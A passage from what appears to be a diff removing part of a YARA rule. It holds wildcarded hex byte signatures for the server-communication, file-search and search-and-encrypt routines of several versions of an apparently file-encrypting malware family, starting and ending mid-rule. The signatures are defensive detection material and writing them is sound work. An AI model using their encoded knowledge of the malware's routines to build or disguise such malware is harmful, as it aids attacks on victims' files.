-            83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6
-            EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51
-            8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51
-            52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24
-        }
-		$server_communication_0_3_3_2 = {
-            52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52
-            57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF
-            D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5
-        }
-		$server_communication_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB
-            04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D
-            ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50
-            A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
-        }
-		$server_communication_0_3_4a_2 = {
-            8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ??
-            ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8
-            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE
-            FD FF FF 8B 44 24 ?? 50 FF 15
-        }
-		$server_communication_0_3_5a_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44
-            24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50
-            68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ??
-            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83
-            C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ??
-            ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ??
-            83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8
-        }
-		$server_communication_0_3_5a_2 = {
-            8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ??
-            ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50
-            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54
-            24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15
-        }
-		$server_communication_2_0_4e = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ??
-            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ??
-            ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68
-            ?? ?? ?? ?? FF 15
-        }
-		$search_and_encrypt_2_0_4e_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56
-            57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84
-        }
-		$search_and_encrypt_2_0_4e_2 = {
-            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
-        }
-		$search_and_encrypt_2_0_4e_3 = {
-            8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84
-        }
-		$search_and_encrypt_2_0_4e_4 = {
-            8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ??
-            66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8
-        }
-		$search_and_encrypt_2_0_4e_5 = {
-            8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ??
-            ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83
-            C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ??
-            83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15
-        }
-		$server_communication_4_0_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24
-        }
-		$server_communication_4_0_2 = {
-            8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D
-            ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB
-            75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C
-            ?? ?? ?? ?? 50 E8
-        }
-		$server_communication_4_0_3 = {
-            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2]
-            8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ??
-            ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50
-        }
-		$file_search_4_0_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ??
-            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 51 E8
-        }
-		$file_search_4_0_2 = {
-            74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52
-            8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 50 8D 8D
-        }
-		$file_search_4_0_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33
-            CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$file_search_4_1b_1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-        }
-		$file_search_4_1b_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ??
-            0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52
-            51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ??
-            ?? ?? 8B 1D
-        }
-		$file_search_4_1b_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ??
-            ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ??
-            FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$server_communication_4_1b_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8
-        }
-		$server_communication_4_1b_2 = {
-            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D
-            ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F
-            B6 ?? ?? ?? ?? ?? 83 C4 0C
-        }
-		$server_communication_4_1b_3 = {
-            8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
-            8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40
-            3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D
-            84 0C ?? ?? ?? ?? 50 E8
-        }
-		$server_communication_4_1b_4 = {
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24
-            ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ??
-            ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48
-            ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15
-        }
-		$server_communication_4_1b_5 = {
-            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ??
-            ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C
-            24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15
-        }
-		$file_search_4_2_1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
-            FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
-        }
-		$file_search_4_2_2 = {
-            FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51
-            6A ?? FF D3
-        }
-		$server_communication_4_2_1 = {
